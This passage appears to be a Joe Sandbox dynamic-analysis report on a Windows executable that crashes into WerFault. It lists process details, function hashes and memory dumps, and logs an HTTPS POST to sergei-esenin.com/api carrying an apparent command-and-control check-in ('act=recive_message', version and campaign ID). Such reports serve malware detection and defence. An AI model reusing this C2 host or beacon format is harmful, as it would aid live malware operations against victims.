2024-10-14 01:07:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	172.67.206.204	443	5040	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 01:07:07 UTC	354	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=A31cOGSCOICaT7wlGyZE7Q6paPS.P3SiUU5896xbzcc-1728868026-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: sergei-esenin.com
2024-10-14 01:07:07 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
2024-10-14 01:07:07 UTC	829	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 01:07:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6smragfn98o43pjhk54sastec4; expires=Thu, 06 Feb 2025 18:53:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ay8p9XqVTmpXmFk62pmUVvMyk%2B0CuOZ6qD94AD3q%2BZ6bgUcVGnbrvwV0WCkZwyiNwi8c1MX3yjslhK8jrXxXySDZ58Qc0EXLGFX2TRm9CFMKiaNBgVQBiff%2BHW%2F9mIzprnqwJQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d23abb40bef430d-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 01:07:07 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-14 01:07:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	21:07:02
Start date:	13/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x900000
File size:	2'936'320 bytes
MD5 hash:	AA925ED1E2CDA721F6AD1197EBB068D3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	21:07:07
Start date:	13/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 1992
Imagebase:	0xfb0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	21:07:22
Start date:	13/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 1972
Imagebase:	0xfb0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	36.4%
Total number of Nodes:	220
Total number of Limit Nodes:	17

Executed Functions

Function 0090FCA0 Relevance: 6.6, Strings: 5, Instructions: 373
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

t, xrefs: 0090FCBE
VY^_, xrefs: 0090FDFF
V, xrefs: 0090FEDC
J|BJ, xrefs: 0091000D
A31cOGSCOICaT7wlGyZE7Q6paPS.P3SiUU5896xbzcc-1728868026-0.0.1.1-/api, xrefs: 00910137, 00910154

Memory Dump Source

Source File: 00000000.00000002.2239635131.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2239577370.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2239698326.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2239725203.000000000096C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240388453.0000000000AC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240418387.0000000000AC8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240450322.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240478127.0000000000AD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240502965.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240502965.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240551621.0000000000AEB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240573896.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240596830.0000000000AF7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240620625.0000000000AF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240641561.0000000000AFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240667830.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240691889.0000000000B11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240718615.0000000000B12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240751607.0000000000B16000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240783995.0000000000B17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240827920.0000000000B1F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240867874.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240894258.0000000000B26000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240926529.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240960703.0000000000B3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240984388.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2241182342.0000000000B43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2244145175.0000000000B4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2244976869.0000000000B54000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246229225.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246744356.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246830064.0000000000B59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247059287.0000000000B63000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247307312.0000000000B64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247453390.0000000000B65000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247595084.0000000000B68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247764342.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248292993.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248386113.0000000000B78000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248445384.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248491146.0000000000B81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248536091.0000000000B84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248585613.0000000000B9B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248638106.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248638106.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248855220.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248906755.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248956513.0000000000BD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249004963.0000000000BD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249095083.0000000000BED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249155594.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249155594.0000000000BF5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249252711.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249305870.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_file.jbxd

Similarity

API ID:
String ID: A31cOGSCOICaT7wlGyZE7Q6paPS.P3SiUU5896xbzcc-1728868026-0.0.1.1-/api$J|BJ$V$VY^_$t
API String ID: 0-943571221
Opcode ID: 39f723b73b03cee515d02a330e5f9bb17049723fab80c0257fa72b17a34a0c6a
Instruction ID: c4068dd925c855f5437a74bbef6aed4dfc72da18239c408aacb8dc65bf282506
Opcode Fuzzy Hash: 39f723b73b03cee515d02a330e5f9bb17049723fab80c0257fa72b17a34a0c6a
Instruction Fuzzy Hash: 2CD1977560C384AFD320DF14849069FBBE5ABD6B44F14882CF4C98B252C37ACD89DB92

Function 00945700 Relevance: 1.6, APIs: 1, Instructions: 69
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 00945784

Memory Dump Source

Source File: 00000000.00000002.2239635131.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2239577370.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2239698326.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2239725203.000000000096C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240388453.0000000000AC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240418387.0000000000AC8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240450322.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240478127.0000000000AD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240502965.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240502965.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240551621.0000000000AEB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240573896.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240596830.0000000000AF7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240620625.0000000000AF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240641561.0000000000AFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240667830.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240691889.0000000000B11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240718615.0000000000B12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240751607.0000000000B16000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240783995.0000000000B17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240827920.0000000000B1F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240867874.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240894258.0000000000B26000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240926529.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240960703.0000000000B3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240984388.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2241182342.0000000000B43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2244145175.0000000000B4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2244976869.0000000000B54000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246229225.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246744356.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246830064.0000000000B59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247059287.0000000000B63000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247307312.0000000000B64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247453390.0000000000B65000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247595084.0000000000B68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247764342.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248292993.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248386113.0000000000B78000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248445384.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248491146.0000000000B81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248536091.0000000000B84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248585613.0000000000B9B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248638106.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248638106.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248855220.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248906755.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248956513.0000000000BD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249004963.0000000000BD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249095083.0000000000BED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249155594.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249155594.0000000000BF5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249252711.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249305870.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9432e57a157e2c5ae8db122c5a5a8bd9635c1fb6add5fe67cd3f63105311e55c
Instruction ID: 357a14eebdb72a95a84fafb78448147f252842798cfb1055e50d4a6f7bb0f848
Opcode Fuzzy Hash: 9432e57a157e2c5ae8db122c5a5a8bd9635c1fb6add5fe67cd3f63105311e55c
Instruction Fuzzy Hash: 6D11A07191D240EBC301AF68E841E1BBBF5EF8A711F05882CE4C49B222D335D910CB93

Function 0091049B Relevance: .3, Instructions: 264
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2239635131.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2239577370.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2239698326.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2239725203.000000000096C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240388453.0000000000AC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240418387.0000000000AC8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240450322.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240478127.0000000000AD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240502965.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240502965.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240551621.0000000000AEB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240573896.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240596830.0000000000AF7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240620625.0000000000AF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240641561.0000000000AFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240667830.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240691889.0000000000B11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240718615.0000000000B12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240751607.0000000000B16000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240783995.0000000000B17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240827920.0000000000B1F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240867874.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240894258.0000000000B26000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240926529.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240960703.0000000000B3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240984388.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2241182342.0000000000B43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2244145175.0000000000B4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2244976869.0000000000B54000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246229225.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246744356.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246830064.0000000000B59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247059287.0000000000B63000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247307312.0000000000B64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247453390.0000000000B65000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247595084.0000000000B68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247764342.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248292993.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248386113.0000000000B78000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248445384.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248491146.0000000000B81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248536091.0000000000B84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248585613.0000000000B9B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248638106.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248638106.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248855220.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248906755.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248956513.0000000000BD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249004963.0000000000BD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249095083.0000000000BED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249155594.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249155594.0000000000BF5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249252711.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249305870.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20c59a5fb740b73fc692e151fc5036446e5997154e436bd7bea6114094c489d9
Instruction ID: bcc39d6b3cae5ee7bb3f0e61be47169f7c3a6882bb57b12a38aae794b53f6677
Opcode Fuzzy Hash: 20c59a5fb740b73fc692e151fc5036446e5997154e436bd7bea6114094c489d9
Instruction Fuzzy Hash: DF91BC75214B01CFD324CF21E8A0A27B7F6FF89314B118A6CE8568BAA1D731E855DB50

Function 00910228 Relevance: .2, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2239635131.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2239577370.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2239698326.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2239725203.000000000096C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240388453.0000000000AC6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240418387.0000000000AC8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240450322.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240478127.0000000000AD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240502965.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240502965.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240551621.0000000000AEB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240573896.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240596830.0000000000AF7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240620625.0000000000AF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240641561.0000000000AFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240667830.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240691889.0000000000B11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240718615.0000000000B12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240751607.0000000000B16000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240783995.0000000000B17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240827920.0000000000B1F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240867874.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240894258.0000000000B26000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240926529.0000000000B2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240960703.0000000000B3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240984388.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2241182342.0000000000B43000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2244145175.0000000000B4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2244976869.0000000000B54000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246229225.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246744356.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246830064.0000000000B59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247059287.0000000000B63000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247307312.0000000000B64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247453390.0000000000B65000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247595084.0000000000B68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2247764342.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248292993.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248386113.0000000000B78000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248445384.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248491146.0000000000B81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248536091.0000000000B84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248585613.0000000000B9B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248638106.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248638106.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248855220.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248906755.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248956513.0000000000BD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249004963.0000000000BD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249095083.0000000000BED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249155594.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249155594.0000000000BF5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249252711.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2249305870.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb047f43fe5ce3e34e9bd6abfa23d758501efd8d2933f56bec8b582d99094795
Instruction ID: 87495b5ee7492dac871dd7664b2332f7711080dc8228fc67679f572c9c744179
Opcode Fuzzy Hash: bb047f43fe5ce3e34e9bd6abfa23d758501efd8d2933f56bec8b582d99094795
Instruction Fuzzy Hash: F671A938214701DFD7248F21ECA4F27B7F6FF8A305F108968E8568BA62C735A855DB50

Function 0090D110 Relevance: .2, Instructions: 168
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2239635131.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

